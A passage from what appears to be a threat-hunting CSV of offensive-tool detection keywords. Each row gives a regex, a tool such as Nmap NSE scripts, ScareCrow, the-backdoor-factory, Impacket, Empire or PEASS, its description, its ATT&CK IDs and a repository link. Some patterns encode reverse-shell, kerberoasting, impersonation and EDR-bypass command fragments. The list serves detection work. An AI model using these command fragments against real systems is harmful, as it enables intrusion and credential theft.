Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-wordpress-users.nse*",".{0,1000}\shttp\-wordpress\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-xssed.nse*",".{0,1000}\shttp\-xssed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -I *.bin * -Loader dll*",".{0,1000}\s\-I\s.{0,1000}\.bin\s.{0,1000}\s\-Loader\sdll.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "* -i -H * -P * -s reverse_shell_tcp -a -u .moocowwow*",".{0,1000}\s\-i\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-s\sreverse_shell_tcp\s\-a\s\-u\s\.moocowwow.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* -i havex.profile *",".{0,1000}\s\-i\shavex\.profile\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "* -i portscan445.gnmap -o shares_found.txt*",".{0,1000}\s\-i\sportscan445\.gnmap\s\-o\sshares_found\.txt.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "* -i snmp-ips.txt -c community.txt*",".{0,1000}\s\-i\ssnmp\-ips\.txt\s\-c\scommunity\.txt.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","470","85","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "* -i -t hiphp:latest*",".{0,1000}\s\-i\s\-t\shiphp\:latest.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "* iat_obfuscation.exe*",".{0,1000}\siat_obfuscation\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* iax2-brute.nse*",".{0,1000}\siax2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* iax2-version.nse*",".{0,1000}\siax2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* icap-info.nse*",".{0,1000}\sicap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* icebreaker.py*",".{0,1000}\sicebreaker\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "* id_reverse-ssh.pub*",".{0,1000}\sid_reverse\-ssh\.pub.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "* -Identity * -Set @{serviceprincipalname='*'}*",".{0,1000}\s\-Identity\s.{0,1000}\s\-Set\s\@\{serviceprincipalname\=\'.{0,1000}\'\}.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting by setting SPN","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -Identity * -XOR @{useraccountcontrol=4194304*",".{0,1000}\s\-Identity\s.{0,1000}\s\-XOR\s\@\{useraccountcontrol\=4194304.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting we need ACL write permissions to set UserAccountControl flags for the target user. Using PowerView","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* iec-identify.nse*",".{0,1000}\siec\-identify\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* iis_controller.py*",".{0,1000}\siis_controller\.py.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "* ike-version.nse*",".{0,1000}\sike\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -im amass -ir *",".{0,1000}\s\-im\samass\s\-ir\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -im get-dns-records*",".{0,1000}\s\-im\sget\-dns\-records.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -im github-get-repositories*",".{0,1000}\s\-im\sgithub\-get\-repositories.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -im google-get-linkedIn-employees*",".{0,1000}\s\-im\sgoogle\-get\-linkedIn\-employees.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -im grep-through-commits*",".{0,1000}\s\-im\sgrep\-through\-commits.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -im massdns*",".{0,1000}\s\-im\smassdns.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* imaohw*",".{0,1000}\simaohw.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* imap-brute.nse*",".{0,1000}\simap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* imap-capabilities.nse*",".{0,1000}\simap\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* imap-log4shell.nse*",".{0,1000}\simap\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* imap-ntlm-info.nse*",".{0,1000}\simap\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* impacket *",".{0,1000}\simpacket\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "* impacket*",".{0,1000}\simpacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* impacket*",".{0,1000}\simpacket.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "* impacket.*",".{0,1000}\simpacket\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* impacket/*",".{0,1000}\simpacket\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* --impersonate Administrator -shell *",".{0,1000}\s\-\-impersonate\sAdministrator\s\-shell\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -impersonate* -hashes*",".{0,1000}\s\-impersonate.{0,1000}\s\-hashes.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* Impersonate.exe *",".{0,1000}\sImpersonate\.exe\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "* impersonate.py *",".{0,1000}\simpersonate\.py\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "* -ImpersonateUser *",".{0,1000}\s\-ImpersonateUser\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* ImplantSSP.exe*",".{0,1000}\sImplantSSP\.exe.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "* import Exrop*",".{0,1000}\simport\sExrop.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "* import LinpeasBaseBuilder*",".{0,1000}\simport\sLinpeasBaseBuilder.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* import LinpeasBuilder*",".{0,1000}\simport\sLinpeasBuilder.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* import PEASLoaded*",".{0,1000}\simport\sPEASLoaded.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* import PEASRecord*",".{0,1000}\simport\sPEASRecord.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* Import tokens from other tools for use in GraphRunner*",".{0,1000}\sImport\stokens\sfrom\sother\stools\sfor\suse\sin\sGraphRunner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* -ImportDllPathPtr *",".{0,1000}\s\-ImportDllPathPtr\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* impress-remote-discover.nse*",".{0,1000}\simpress\-remote\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -inc -u=0 *.pwd*",".{0,1000}\s\-inc\s\-u\=0\s.{0,1000}\.pwd.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* -inc=digits *",".{0,1000}\s\-inc\=digits\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* inceptor.*dotnet*",".{0,1000}\sinceptor\..{0,1000}dotnet.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* 